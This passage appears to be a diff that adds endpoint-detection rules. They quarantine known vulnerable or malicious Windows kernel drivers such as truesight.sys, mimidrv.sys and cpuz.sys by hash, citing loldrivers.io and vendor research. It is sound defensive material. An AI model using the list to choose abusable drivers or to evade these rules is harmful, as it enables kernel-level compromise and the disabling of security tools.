+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982783Z",
+ "creation_date": "2026-03-23T11:45:29.982785Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982791Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "36875562e747136313ec5db58174e5fab870997a054ca8d3987d181599c7db6a",
+ "comment": "Vulnerable Kernel Driver (aka d3.sys) [https://www.loldrivers.io/drivers/13b2424a-d337-4bc7-ad1d-2049c79906b4/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c9bb27e1-f6b7-515d-bce0-e3642e79674b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827515Z",
+ "creation_date": "2026-03-23T11:45:31.827517Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827523Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b87c1cbcddf705ac36318dd8e94167ef075ba3ae916ad616a89a8359e6b37f89",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c9c3b56a-956d-56e4-bfaf-83a0ff19bb27",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982904Z",
+ "creation_date": "2026-03-23T11:45:29.982906Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982911Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "48b1344e45e4de4dfb74ef918af5e0e403001c9061018e703261bbd72dc30548",
+ "comment": "Vulnerable Kernel Driver (aka WiseUnlo.sys) [https://www.loldrivers.io/drivers/b28cc2ee-d4a2-4fe4-9acb-a7a61cad20c6/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c9c75ac2-0714-5f2b-bbb2-38c25dc23561",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495886Z",
+ "creation_date": "2026-03-23T11:45:31.495888Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495894Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4f19be2c132005189b4bed20bb2968673555f93f961a1b7ace91bd69aec7ef10",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c9ccab93-9c73-5dcf-86e1-f0b9be0555de",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834549Z",
+ "creation_date": "2026-03-23T11:45:30.834552Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834561Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "445c9a8200c34c8ff4d7eba1df57247b32780132c0cb16c9e085f40f4d874c66",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c9cdc50b-9d2b-51b1-b1d3-b5fa51176b9e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616150Z",
+ "creation_date": "2026-03-23T11:45:29.616153Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616158Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f2b51fbeead17f5ee34d5b4a3a83c848fb76f8f0e80769212e137a7aa539a3bc",
+ "comment": "Phoenix Tech. vulnerable BIOS update tool (aka PhlashNT.sys and WinFlash64.sys) [https://www.loldrivers.io/drivers/be3e49ea-095e-4fdb-9529-f4c2dbb9a9fc/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c9ce7030-ea2d-5fb0-829e-cfcbff58dc84",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820547Z",
+ "creation_date": "2026-03-23T11:45:30.820549Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820554Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "74264ce2e0ed67730b0f3c719aee37664d4688f872875322a64022cd68e060bb",
+ "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c9d2b6eb-e985-5e0c-9f93-a6a2fbfeb300",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148019Z",
+ "creation_date": "2026-03-23T11:45:31.148021Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148026Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a3fd69a7e84c6c5f84cc8617e868d3719b7f9ade196467b49a5a82e7ea65619a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c9d34c34-ef50-5d3c-8811-1a13b9c3ab7a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620260Z",
+ "creation_date": "2026-03-23T11:45:29.620262Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620267Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "61d6e40601fa368800980801a662a5b3b36e3c23296e8ae1c85726a56ef18cc8",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c9dac64a-7c54-578b-890e-5af4724dfa5a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977000Z",
+ "creation_date": "2026-03-23T11:45:29.977003Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977008Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "78536b73d77fc07c9ca55766f592852abda179c6deb92c4456cfd89492b594ac",
+ "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c9e6f7b7-8fed-591e-b121-daf8595cc5da",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980116Z",
+ "creation_date": "2026-03-23T11:45:29.980117Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980123Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f15962354d37089884abba417f58e9dbd521569b4f69037a24a37cfc2a490672",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c9ea0de8-7e38-5486-970c-354ddfb4cc59",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159710Z",
+ "creation_date": "2026-03-23T11:45:31.159712Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159717Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3775d48fe24462bcb6139ce2b4630efb307f18d804e58549cd5fb00ff24a5b6e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c9ea16b6-6601-5fe4-b206-4eb0eeda689e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455445Z",
+ "creation_date": "2026-03-23T11:45:30.455448Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455457Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8ecd15521b2c37d2ff02a138700007f2aff28a0accfa6fb3480a4421194ef7d2",
+ "comment": "Vulnerable Kernel Driver (aka mhyprotrpg.sys) [https://www.loldrivers.io/drivers/181b89e5-4bdd-4e95-b1bc-a294a4adfb29/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c9eef577-11e4-5cdf-9250-c80361f176ce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832960Z",
+ "creation_date": "2026-03-23T11:45:30.832963Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832971Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "36c1d01074ceca73b7cbe87b0731ecd8fdeb1518de610f72a23bd7821124f469",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c9f034a4-260d-5387-b2a0-2be9a2ff07fa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485483Z",
+ "creation_date": "2026-03-23T11:45:31.485486Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485496Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fa3e1336fbdb2d5751502185168dd5ebfeedcebd2e9992209962f316116b3c7b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c9f0c941-ea47-5800-89b5-68ca5e3e5ed7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833202Z",
+ "creation_date": "2026-03-23T11:45:30.833206Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833215Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f31f2dc87e5d6d75ea026d031bcd93d68dea66b168c1171c67a25c4ef2641c14",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c9f55acd-2255-589a-a5f2-7d9ff8002fed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493737Z",
+ "creation_date": "2026-03-23T11:45:31.493740Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493748Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d9f9e0d886e5c02e9b803fe730a9c796ce9bda5763d14fe591bae72c284a359d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ca0e062b-1254-54f1-a191-47e4b933af3e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473066Z",
+ "creation_date": "2026-03-23T11:45:30.473070Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473079Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a11cf43794ea5b5122a0851bf7de08e559f6e9219c77f9888ff740055f2c155e",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ca1dcb39-6f83-5e95-9f83-7dceb7840be8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153258Z",
+ "creation_date": "2026-03-23T11:45:31.153261Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153269Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d463ddc2979f150d69f7b0c029e6d2a496da80c31dd187fe17b5a4758422d3eb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ca21f245-0fea-5922-b730-e9a3fe6c35f1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467032Z",
+ "creation_date": "2026-03-23T11:45:30.467035Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467044Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e0fa3fa9488583353b39f12f857911b7115ecd82b70f6fb7be70633d72147649",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ca22d5b7-1a3f-5294-9414-f2c4b1ac3791",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824820Z",
+ "creation_date": "2026-03-23T11:45:30.824823Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824831Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ff613c93ca3d3083256122c149f93d280c5a399b95056021d2824fe885abbc2c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ca2846ea-82cb-5900-857b-dfa65eb613be",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621737Z",
+ "creation_date": "2026-03-23T11:45:29.621739Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621745Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c470c9db58840149ce002f3e6003382ecf740884a683bae8f9d10831be218fa2",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ca44402d-5da0-5fd4-b3d1-c8991d23d2e6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
